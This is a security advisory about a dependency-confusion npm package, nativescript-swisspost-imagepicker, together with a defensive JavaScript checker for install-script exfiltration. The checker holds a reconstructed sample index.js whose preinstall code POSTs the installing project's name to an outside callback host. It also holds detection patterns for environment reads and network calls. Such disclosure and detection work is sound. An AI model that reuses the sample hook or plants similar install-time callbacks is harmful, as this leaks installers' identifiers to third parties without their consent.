MAL-2026-5792
Malicious code in nativescript-swisspost-imagepicker (npm)
Details
--- _-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (b2271ce1525f722f302ee59b9de3270020e6d1aa84d74cc2972cb6ffa34d9a62)

package.json declares `preinstall: node index.js`. On `npm install`, index.js reads `process.env.INIT_CWD` (the working directory of the project doing the install), takes its basename, and POSTs a JSON payload `{pkg, timestamp, transport, project}` to the hardcoded URL `https://deepbounty.dd06-dev.fr/cb/d27071f6-8aa6-43b9-98be-0caf9803fba5`.

The package name `nativescript-swisspost-imagepicker`, the package description (`Security PoC for Bug Bounty`) and the comment `Harmless dependency confusion PoC` in index.js identify this as a dependency-confusion squat targeting an internal Swiss Post NativeScript namespace. On install, the installing project's name is silently sent to a third-party endpoint. That confirms to the operator of `deepbounty.dd06-dev.fr` both that the private package name exists and which organizations' builds resolved this public package in its place, giving them a directory of affected targets.

The author's self-labelling as a bug-bounty PoC does not change the installer-side impact: unsolicited install-time outbound network traffic carrying installer-side identifiers to an attacker-controlled host.
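The behaviour described above has a recognisable static shape: a lifecycle hook that runs a script which reads installer-side environment (`INIT_CWD`) and also has a network sink. The check below is an added triage example, not code from this advisory or from the package itself. The package.json and index.js it scans are constructed sample inputs modelled on the advisory's description (the hook name, the `INIT_CWD` read, the JSON fields and the callback URL are taken from the text above; the exact source of the real index.js is not reproduced here), and the hook/pattern lists are the author's own choices, not a published rule set.

```javascript
// Added example, not code from the advisory or from the package: a static
// triage check that flags npm lifecycle hooks whose script reads installer-
// side environment (INIT_CWD and similar) and also contains a network sink.
'use strict';

// Hooks npm runs automatically during install (assumed list for this check).
const LIFECYCLE_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// Installer-side identifiers an install script has no business reading.
const ENV_LEAK_RE = /process\.env\.(?:INIT_CWD|npm_config_\w+|HOME|USER|USERNAME|HOSTNAME)\b/g;
// Outbound network primitives and hardcoded http(s) URLs.
const NETWORK_RE = /\b(?:https?\.request|https?\.get|fetch|axios|got)\s*\(|https?:\/\/[^\s'"`)]+/g;

function scriptTargets(manifest) {
  // Return the lifecycle hooks declared in package.json and, for plain
  // "node <file>" hooks, the file they run. Other commands are reported with
  // file = null so they still surface for manual review.
  const scripts = manifest.scripts || {};
  return LIFECYCLE_HOOKS
    .filter((hook) => typeof scripts[hook] === 'string')
    .map((hook) => {
      const m = /\bnode\s+(\S+\.[cm]?js)\b/.exec(scripts[hook]);
      return { hook, command: scripts[hook], file: m ? m[1] : null };
    });
}

function triageInstallScripts(manifest, files) {
  // manifest: parsed package.json; files: map of path -> source text.
  const findings = [];
  for (const target of scriptTargets(manifest)) {
    const src = target.file ? files[target.file] || '' : '';
    const envHits = [...new Set(src.match(ENV_LEAK_RE) || [])];
    const netHits = [...new Set(src.match(NETWORK_RE) || [])];
    findings.push({
      hook: target.hook,
      command: target.command,
      file: target.file,
      readsInstallerEnv: envHits,
      networkCalls: netHits.filter((h) => !/^https?:\/\//.test(h)),
      hardcodedUrls: netHits.filter((h) => /^https?:\/\//.test(h)),
      // Verdict: installer identifiers read AND a network sink in the same
      // hook script is the install-time exfiltration shape, whatever the
      // script's comments claim about being harmless.
      exfil: envHits.length > 0 && netHits.length > 0,
    });
  }
  return findings;
}

// Constructed sample inputs modelled on the advisory text (not the real files).
const samplePackageJson = {
  name: 'nativescript-swisspost-imagepicker',
  version: '0.0.0',
  description: 'Security PoC for Bug Bounty',
  scripts: { preinstall: 'node index.js' },
};

const sampleIndexJs = `
// Harmless dependency confusion PoC
const https = require('https');
const path = require('path');
const project = path.basename(process.env.INIT_CWD || process.cwd());
const body = JSON.stringify({ pkg: 'nativescript-swisspost-imagepicker',
  timestamp: Date.now(), transport: 'https', project });
const req = https.request('https://deepbounty.dd06-dev.fr/cb/d27071f6-8aa6-43b9-98be-0caf9803fba5',
  { method: 'POST', headers: { 'content-type': 'application/json' } });
req.end(body);
`;

function triageSample() {
  return triageInstallScripts(samplePackageJson, { 'index.js': sampleIndexJs });
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(triageSample(), null, 2));
}
```

Run against an unpacked tarball (`npm pack <name>` then extract) rather than an installed copy, so the hook never executes. A finding with `exfil: true` on a name that matches one of your internal scopes is the dependency-confusion signal; the complementary preventive controls are routing the internal scope to the private registry (a scoped registry entry in `.npmrc`) and disabling install scripts in CI (`ignore-scripts=true`).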
Affected packages
No fixed version published yet for nativescript-swisspost-imagepicker (npm). Because this is a dependency-confusion squat rather than a compromised release of a legitimate project, there is no known-safe version to pin to: remove the package, check lockfiles and CI install logs for resolutions of this name from the public registry, and make sure the internal scope it impersonates resolves only from the private registry, with install scripts disabled in CI where feasible.